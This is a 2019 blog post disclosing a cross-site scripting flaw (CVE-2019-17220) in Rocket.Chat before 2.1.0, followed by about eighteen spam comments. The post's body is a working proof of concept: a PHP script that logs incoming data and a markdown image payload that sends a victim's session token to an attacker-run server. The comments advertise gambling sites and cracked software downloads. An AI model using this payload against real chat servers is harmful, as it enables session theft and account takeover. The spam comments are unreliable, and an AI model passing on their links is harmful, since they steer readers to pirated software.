Wednesday, October 2, 2019

Rocket.Chat Cross Site Scripting CVE-2019-17220

Rocket.Chat versions prior to 2.1.0 suffer from a cross-site scripting vulnerability.

As I found out, the service has a security problem that will lead to the disclosure of user information.

Packet Storm
Mitre CVE
NIST
Exploit-DB



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

1. Create l33t.php on a web server 


<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

2. Open a chat session
3. Send payload with your web server url


![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. Token will be written in logs.txt when target seen your message.

30 comments:

  1. Really impressed! Everything is very open and very clear clarification of issues. It contains truly facts. Your website is very valuable. Thanks for sharing. 프리서버

    ReplyDelete
  2. A fundamental hotspot for the group of onlookers that makes the peruser stride by step.
    IT support Phoenix

    ReplyDelete
  3. I am really enjoying reading your well written articles. It looks like you spend a lot of effort and time on your blog. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work. free chat room

    ReplyDelete
  4. Excellent article. Very interesting to read. I really love to read such a nice article. Thanks! keep rocking. 결혼정보업체

    ReplyDelete
  5. At that point lauding the characteristics of his crowd, and announcing "Effortlessness and Peace, of God the Father and of our Lord Jesus Christ. tool reviews

    ReplyDelete
  6. Ich habe auch ein paar nützliche Informationen zum Thema Wallbox gefunden. Wallbox

    ReplyDelete
  7. Fabulous post, you have denoted out some fantastic points, I likewise think this s a very wonderful website. I will visit again for more quality contents and also, recommend this site to all. Thanks. hkeasychat

    ReplyDelete
  8. How to set up Echo Plus Setup and Download Alexa App?

    Alexa, well renowned advanced technology that recognizes human voice easily and functions on cloud-based networking system. In this blog we will tell you to set up Echo plus setup and Download Alexa App. You must firstly link to download Alexa App on the smartphone/tablet. Well, we are happy to say that Alexa is available on Android/IOS devices. One need to login Amazon Alexa with your Amazon ID and Password and set up Alexa. Well, Alexa is available on Android/IOS devices. One need to login Amazon with your ID and Password and set up for Alexa.
    • Tap to go to settings and click on Setup to get Echo App Setup Download link.
    • Later, after you have done with this method select type of echo device you are going to link.
    • It is recommended if you have more than two device just turn off microphones of other devices for better interaction.

    ReplyDelete
  9. This is really nice post, I love this content also visit Free Chattting Online Malaysia. Thanks for sharing.

    ReplyDelete
  10. It’s great to come across a blog every once in a while that isn’t the same out of date rehashed material. Fantastic read. Get for more information Download Alexa App

    ReplyDelete
  11. this is really nice to read..informative post is very good to read..thanks a lot! ป๊อกเด้ง

    ReplyDelete
  12. I high appreciate this post. It’s hard to find the good from the bad sometimes, but I think you’ve nailed it! would you mind updating your blog with more information? ป๊อกเด้ง

    ReplyDelete
  13. The post is written in very a good manner and it contains many useful information for me. วิธีแทงไฮโลออนไลน์บนมือถือ

    ReplyDelete
  14. When you use a genuine service, you will be able to provide instructions, share materials and choose the formatting style. สมัครเล่นไฮโลออนไลน์

    ReplyDelete
  15. I found your this post while searching for some related information on blog search...Its a good post..keep posting and update the information. สมัครเล่นบาคาร่าขั้นต่ำ10บาท

    ReplyDelete
  16. 1XBet
    Betting in septcasino India. It 1xbet login can be great to find the most popular 바카라 사이트 brands, especially ones that offer betting on sports such as gri-go.com football, tennis,  Rating: 1/10 · ‎Review by communitykhabar Riku VihreasaariWhere can I find 1xbet?Where can I find 1xbet betting?

    ReplyDelete
  17. Microsoft Office 2011 Crack are totally competent to involve its various highlights to deal with their archives exhaustively and complete way. MS Office 2011 For Pc

    ReplyDelete
  18. Cash Register Pro Crack is without a doubt the most impressive piece of software that the company has ever produced.
    https://fullkeygens.com/cash-register-pro-crack/

    ReplyDelete